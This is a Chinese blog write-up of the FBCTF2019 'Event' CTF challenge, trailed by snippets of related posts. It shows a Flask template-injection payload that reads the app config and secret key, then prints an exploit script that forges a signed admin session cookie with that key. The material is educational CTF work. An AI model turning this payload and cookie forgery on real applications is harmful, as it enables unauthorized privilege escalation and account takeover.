[FBCTF2019]Event

最新推荐文章于 2022-09-04 17:29:40 发布
最新推荐文章于 2022-09-04 17:29:40 发布
阅读量445 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/108262535
版权

在这里插入图片描述
很明显要让我们伪造一个admin

在这里插入图片描述
开始看到这里以为是个xss,测试无果
在这里插入图片描述

注意他的cookie是三段式
那么这题的思路就是尝试篡改cookie来提权

有一个思路 利用SSTI模板注入 获取秘钥,然后重新生成签名cookie

测试模板注入
最终发现

event_important存在模板注入

尝试模板注入测试

具体过程如下
https://xz.aliyun.com/t/5399#toc-1

读取配置文件

__class__.__init__.__globals__[app].config

在这里插入图片描述
接着伪造签名即可
exp

from flask import Flask
from flask.sessions import SecureCookieSessionInterface

app = Flask(__name__)
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'

session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)

@app.route('/')
def index():
    print(session_serializer.dumps("admin"))

index()
penson by 小乌
关注
Autosar诊断实战系列03-Dem之Event的NvM存储详解
initiallizer的博客
06-26 2081
详解Dem中Event的存储,主要话题如下:1)Dem触发NvM存储的基本流程;2)Dem触发NvM存储的layout格式及内容,Event与DTC的存储关系;3)Combined Event的存储处理。
EDA - 如何设计一个支持【异步/同步】模式的 Event-Driven Architecture 架构
最新发布
小工匠
07-09 1万+
EDA(Event-Driven Architecture)是一种实现组件之间松耦合、易扩展的架构方式。一个最简单的EDA设计需要包含如下几个组件:Events:需要被处理的数据。Event Handlers:处理Events的方式方法。Event Loop:维护Events和Event Handlers之间的交互流程。举个例子 :Event A将被Handler A处理,而Event B将被Handler B处理,这一切的分配都是由Event Loop所控制的。
BUUCTF [FBCTF2019] Event
Senimo
01-13 464
BUUCTF [FBCTF2019] Event 考点: Flask模版注入 伪造Session登陆 非常规格式SECRET_KEY加密 启动环境: 一个登陆注册页面,若点击Admin panel,提示: 使用Username:test,Password:test登陆后: 并没有限制登陆,可能是成功注册用户test 可以向数据库中添加新的事件,尝试添加: Name:hahaha Address:8.8.8.8 得到回显: 其选项框可以选择显示添加的事件名或事件地址 此时再次点击Admin p
BUUCTF:[FBCTF2019]Event
末初的CSDN博客
07-29 874
题目地址:https://buuoj.cn/challenges#[FBCTF2019]Event 模版注入+Cookie伪造 Cookie:Im1vY2h1Ig.XyDM5A.RIObE23_pwucPR7ZAVNsm_cOwpU 加密方式未知,密钥未知 在提交数据的时候,有三个可控参数,经测试在event_important参数存在模版注入,输入__dict__,发现成功回显 接着查找配置文件:__class__.__init__.__globals__[app].config 发现密钥,开始
BUUCTF--[FBCTF2019]Event
qq_46263951的博客
08-14 250
进入页面,注册登录 访问flag 查看Cookie,这里很容易就猜到是要伪造Cookie 这里有三个参数,上传内容并用Burp抓包可以发现三个参数所对应的变量名. 看大佬的wp知道 在event_important参数存在模版注入,输入__dict__,发现成功回显接着查找配置文件:__class__.__init__.__globals__[app].config 发现加密所需的密钥,伪造session from flask import Flask from flask.sessio...
[FBCTF2019]Event(flask 伪造签名)
paidx0
08-27 305
[FBCTF2019]Event(flask 伪造签名)
event_type_entity_extract_eval.csv
05-06
CCKS2019赛题《面向金融的事件主题》数据,为了方便以后下载,所以上传到CSDN上,因为在查找数据的时候发现只有train数据集,而没有eval数据集,所以上传上去,方便以后学习的时候下载。
Kubernetes基础:问题排查方法示例:结合使用kubectl get event
知行合一 止于至善
02-02 6421
这篇文章以Metrics Server部署时碰到的问题为例,介绍如何结合使用kubectl get event命令进行问题的排查。
keybd_event,mouse_event 模拟产生键盘事件、鼠标事件的使用
01-30
`keybd_event` 和 `mouse_event` 是Windows API(应用程序接口)中两个非常重要的函数,它们允许程序员模拟这些行为。让我们深入探讨这两个函数以及它们如何工作。 **一、`keybd_event` 函数** `keybd_event` 是...
NetScream(网络加速软件) v1.8.4.2014 官方正式版.zip
07-15
NetScream是一款优化你的modem连接速率的工具。NetScream能提高你的internet连接速度,NetScream官方正式版是目前市场上最佳的modem优化工具之一,能极好地提高你的modem的下载/上传速度。它非常易于使用,完全兼容所有版本的Microsoft Windows及各种类型的internet接入方式,如:Dial-up, DSL, ADSL, Cable, ISDN, 和卫星的Internet接入,使你下载音乐、电影和玩网络游戏更加快速。
[FBCTF2019]RCEService
pakho_C的博客
09-04 617
见上图,可见第4步的时候,因为第一个.*可以匹配任何字符,所以最终匹配到了输入串的结尾,也就是//aaaaa。,14步匹配.*,第二个.*匹配到了字符串末尾,最后结束匹配。系统命令需要有特定的环境变量的也就是路径,系统找不到该路径下的exe文件怎么执行系统命令,因此这个地方查阅资料后发现只能调用绝对路径下的命令,cat命令就在/bin/目录下面。所以NFA就开始回溯,先吐出一个a,输入变成第5步显示的//aaaa,但仍然匹配不上正则,继续吐出a,变成//aaa,仍然匹配不上……,假设匹配的输入是
FBCTF2019-RCEService
anwen12的博客
02-26 245
0x01 题目初现 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacking attempt detected<br/><br/>'; } elseif (preg_match('/^.*(alias|bg|bind|break|bui
NO.3-9 [FBCTF2019]RCEService
nigo134的博客
08-06 283
题目叫我们以JSON的格式提交命令,先随便输 提交JSON格式 ?cmd={"cmd":"ls"} 但是经测试发现很多命令被禁止了 在网上找到的源码2333: <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacking attempt de...
FacebookCTF2019 web writeup
river
06-05 3343
facebookCTF2019 rceservice - 绕过preg_match http://challenges.fbctf.com:8085 We created this web interface to run commands on our servers, but since we haven't figured out how to secure it yet we only l...
BUUCTF [FBCTF2019] Products Manager
Senimo
01-08 1487
BUUCTF [FBCTF2019] Products Manager 考点: 启动环境: 产品管理,其中有三个功能: 查看前5的产品 添加产品 查看产品细节 知道了大致功能,尝试正常的业务逻辑,首先添加产品,其Secret值需包含10位以上的大小写字母和数字: 添加成功,查询产品细节: 分析题目给出的源码: 其中footer.php页面没用,header.php页面只是首页的三个跳转链接,index.php页面也没有可利用内容。 在db.php页面中,查看到如下SQL语句: CREATE
iPanel浏览器EVENT处理详解
"iPanel浏览器EVENT处理说明文档主要介绍了如何在iPanel浏览器中处理EVENT,包括处理原则、处理机制、特定按键的处理以及接口Porting的相关内容,旨在帮助开发者更好地控制和管理用户交互事件。" iPanel浏览器EVENT...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值